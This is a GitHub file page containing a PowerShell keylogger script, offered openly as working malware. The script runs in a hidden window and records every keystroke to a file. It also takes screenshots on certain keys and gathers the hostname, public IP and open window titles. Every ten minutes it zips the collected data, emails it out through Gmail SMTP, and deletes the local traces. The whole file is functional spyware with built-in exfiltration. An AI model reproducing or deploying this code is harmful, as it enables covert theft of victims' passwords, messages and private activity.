-
Notifications
You must be signed in to change notification settings - Fork 0
/
Keylogger
110 lines (76 loc) · 6.77 KB
/
Keylogger
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
##opens this powershell script in a closed windows even though there is a small pop up at the start
PowerShell.exe -NonInteractive -Nologo -Noprofile -windowstyle hidden {
$x = 0
##Get the library from a .NET type to use the [System.Windows.Input.Keyboard] so that i can detect the keystrokes and take the screenshots
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
##################################################################################################
##Create a file to store the screenshots and the text file with the keytrokes##
New-Item -Path "C:\Users\Public\Documents\Screen\test.txt" -ItemType File -Force
##Create an array that stores all the possible keys####
$array = @("a","b","c","d","e","f","g","h","i","J","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","space","Enter","1","2","3","4","5","6","7","8","9","Oem5","Capital","backspace","Oem1 ", "OemSemicolon", "OemPlus", "OemComma", "OemMinus", "OemPeriod", "Oem2", "OemQuestion", "Oem3", "OemTilde", "AbntC1", "AbntC2", "Oem4", "OemOpenBrackets", "Oem5", "OemPipe", "Oem6", "OemCloseBrackets", "Oem7", "OemQuotes", "Oem8", "Oem102", "OemBackslash","ctrl")
##################################################################################################
while ($true){
#####loop trought the array of letters until one letter is pressed######
foreach($letter in $array){
$date = Get-Date -Format mm:ss ###Get the time in seconds so that the the files can be sent to the email later
$key = [System.Windows.Input.Keyboard]::IsKeyUp("$letter") ##detect the keystrokes
if ($key -eq $false){
Write-Host "$letter" -NoNewline #Key has been pressed
"°$letter°" | Out-File -Append -FilePath "C:\Users\Public\Documents\Screen\test.txt" -NoNewline #send the letter that has been pressed to the file with the °Example° so that later we can remove them
##################################################################################################
###################Screenshot part#############################################################################################################
if ($letter -eq "Enter" -or $letter -eq "Space" -or $letter -eq "backspace"){ #if the pressed is equal to Enter;space;or backspace we will take a screenshot
$File = "C:\Users\Public\Documents\Screen\Screenshot$x.bmp"
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save($File)
$x = $x + 1
}
####################################################################################################################################################################################################
while($key -eq $false){ ##Dont do anything if the key hasn´t been pressed
$key = [System.Windows.Input.Keyboard]::IsKeyUp("$letter")
}
}
#### if the time is equal to 10m,or 20 or 30 or 40 or 50 minutes, we will remove all the °° that we added before to the letters so that we dont have problems like if the user types in : Enter it will write °E°°n°°t°°e°°r° instead of Enter and get deleted
if ($date -eq "00:00" -or $date -eq "10:00" -or $date -eq "20:00" -or $date -eq "30:00" -or $date -eq "40:00"-or $date -eq "50:00"){
(Get-Content -path C:\Users\Public\Documents\Screen\test.txt -Raw) -replace "Enter" ,"`n" | Set-Content -Path C:\Users\Public\Documents\Screen\test.txt ##trasnform the word Enter into a space down
(Get-Content -path C:\Users\Public\Documents\Screen\test.txt -Raw) -replace "°backspace°" ,"DELETE" | Set-Content -Path C:\Users\Public\Documents\Screen\test.txt
(Get-Content -path C:\Users\Public\Documents\Screen\test.txt -Raw) -replace "space" ," " | Set-Content -Path C:\Users\Public\Documents\Screen\test.txt
(Get-Content -path C:\Users\Public\Documents\Screen\test.txt -Raw) -replace "Capital" ,"|" | Set-Content -Path C:\Users\Public\Documents\Screen\test.txt ##trasnform the word Capital into | si that it occupies less space
(Get-Content -path C:\Users\Public\Documents\Screen\test.txt -Raw) -replace "°" ,"" | Set-Content -Path C:\Users\Public\Documents\Screen\test.txt ##trasnform the word for example: °E°°n°°t°°e°°r° into Enter
#############################Get public ip of the computer#####################################################################
$PublicIp = (Invoke-WebRequest -uri "https://api.ipify.org/").Content
############################Get information about windows that are open#
$Windowsopen = Get-Process | Where-Object {$_.MainWindowTitle -ne ""} | Select-Object MainWindowTitle
Add-Content -Path C:\Users\Public\Documents\Screen\test.txt -Value "This is the Hostname : $env:computername" ##Get the na,e of the computer and output to the notepad
Add-Content -Path C:\Users\Public\Documents\Screen\test.txt -Value "This is the Public IP : $PublicIp" ##Get the public ip of the User and output to the notepad
Add-Content -Path C:\Users\Public\Documents\Screen\test.txt -Value "This were the open windows : " ##Get windows that were open
Add-Content -Path C:\Users\Public\Documents\Screen\test.txt -Value $Windowsopen ##Get windows that were open
Compress-Archive -Path "C:\Users\Public\Documents\Screen" -DestinationPath "C:\Users\Public\Documents\Screen" -Force
$allfiles += "C:\Users\Public\Documents\Screen.zip"
echo "these are all files $allfiles"
#############################################Send an email with the screenshots and Text file#######################################################################################################################################################
$EmailFrom = "YOUR EMAIL HERE"
$EmailTo = "YOUR EMAIL HERE"
$EmailSubject = "Powershell"
$EmailBody = "Screenshots and text"
$SMTPserver= "smtp.gmail.com"
$username="YOUR EMAIL HERE"
$password = "YOUR PASSWORD HERE" | ConvertTo-SecureString -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($username, $password)
Send-MailMessage -ErrorAction Continue -from "$EmailFrom" -to "$EmailTo" -subject "$EmailSubject" -body "$EmailBody" -SmtpServer "$SMTPserver" -Priority "Normal" -Credential $credential -Port 587 -UseSsl -Attachments $allfiles
## this will remove all folders and create them again
Remove-Item -Path "C:\Users\Public\Documents\Screen" -Force -Recurse
Remove-Item -Path "C:\Users\Public\Documents\Screen.zip" -Force -Recurse
New-Item -Path "C:\Users\Public\Documents\Screen" -ItemType Directory -Force
New-Item -Path "C:\Users\Public\Documents\Screen\test.txt" -ItemType File -Force
$allfiles = @()
}
}
}
}